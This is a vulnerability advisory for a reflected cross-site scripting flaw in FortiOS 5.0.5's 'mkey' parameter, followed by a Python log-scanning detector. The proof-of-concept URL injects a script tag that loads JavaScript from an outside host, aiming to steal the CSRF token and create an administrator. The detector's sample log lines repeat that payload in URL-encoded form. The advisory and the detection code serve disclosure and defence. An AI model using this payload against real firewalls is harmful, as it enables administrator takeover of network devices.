packetstorm, William Costa, PACKETSTORM:125050
Feb 04, 2014 - 12:00 a.m.

FortiOS 5.0.5 Cross Site Scripting

2014-02-04 00:00:00
William Costa
packetstormsecurity.com

EPSS: 0.004 (percentile: 74.8%)

`I. VULNERABILITY  
  
-------------------------  
  
Reflected XSS vulnerability in FortiOS 5.0.5  
  
  
  
II. BACKGROUND  
  
-------------------------  
  
Fortinet's industry-leading, Network Security Platforms deliver Next  
Generation Firewall (NGFW) security with exceptional throughput, ultra  
low latency, and multi-vector threat protection.  
  
  
  
III. DESCRIPTION  
  
-------------------------  
  
A reflected XSS vulnerability has been detected in FortiOS 5.0.5.  
  
The code injection is done through the parameter "mkey" in the page  
"/firewall/schedule/recurrdlg".  
  
  
  
IV. PROOF OF CONCEPT  
  
-------------------------  
  
The application does not validate the parameter "mkey" correctly.  
  
  
  
http://IP_FORTIGATE/firewall/schedule/recurrdlg?mkey=a"><SCRIPT  
SRC="http://10.0.1.120/xss/good.js"></SCRIPT>  
  
V. BUSINESS IMPACT  
-------------------------  
An attacker can execute arbitrary HTML or script code in the context  
of a targeted user's browser, allowing theft of the CSRF token and  
thus enabling the creation of an Administrator user on the box for  
full access.  
  
  
  
  
  
VI. SYSTEMS AFFECTED  
-------------------------  
Tried on FortiOS v5.0.5 VM and Appliance  
  
  
  
VII. SOLUTION  
------------------------  
  
Upgrade to FortiOS 5.0.6 or higher.  
  
References  
  
http://www.fortiguard.com/advisory/FG-IR-14-003/  
http://www.kb.cert.org/vuls/id/728638  
  
  
  
By William Costa  
`
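A detection sketch for the issue described above, added here as an example and not part of the original advisory or of any Fortinet code: it scans web or proxy access-log lines for requests to /firewall/schedule/recurrdlg whose "mkey" value, after percent-decoding, contains characters that break out of an HTML attribute. The log layout, the sample lines and the helper names are assumptions; `safe_attr` shows the output encoding whose absence makes the parameter injectable.

```python
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

VULN_PATH = "/firewall/schedule/recurrdlg"  # page named in the advisory
PARAM = "mkey"                              # parameter named in the advisory
BREAKOUT = re.compile(r'["<>]')             # closes an attribute or opens a tag
# Assumed log layout: request line in quotes, as in combined-log format.
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines; the second carries the advisory's PoC value, URL-encoded.
SAMPLES = [
    '10.0.1.50 - - [04/Feb/2014:10:00:01 +0000] "GET /firewall/schedule/recurrdlg?mkey=always HTTP/1.1" 200 5120',
    '10.0.1.50 - - [04/Feb/2014:10:02:13 +0000] "GET /firewall/schedule/recurrdlg?mkey=a%22%3E%3CSCRIPT%20SRC%3D%22http%3A%2F%2F10.0.1.120%2Fxss%2Fgood.js%22%3E%3C%2FSCRIPT%3E HTTP/1.1" 200 5177',
    '10.0.1.50 - - [04/Feb/2014:10:03:40 +0000] "GET /firewall/schedule/recurrdlg?mkey=a%2522%253E HTTP/1.1" 200 5125',
    '10.0.1.50 - - [04/Feb/2014:10:04:02 +0000] "GET /firewall/policy?mkey=%3Cb%3E HTTP/1.1" 200 900',
]


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded values are also seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_mkey(log_line):
    """Return the decoded mkey value if it carries markup characters, else None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if url.path.rstrip("/") != VULN_PATH:
        return None
    for raw in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
        value = fully_decode(raw)  # parse_qs already decoded one layer
        if BREAKOUT.search(value):
            return value
    return None


def safe_attr(value):
    """Encode a value for use inside a double-quoted HTML attribute."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for line in SAMPLES:
        hit = suspicious_mkey(line)
        if hit is not None:
            print("ALERT mkey=%r encoded=%r" % (hit, safe_attr(hit)))
```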
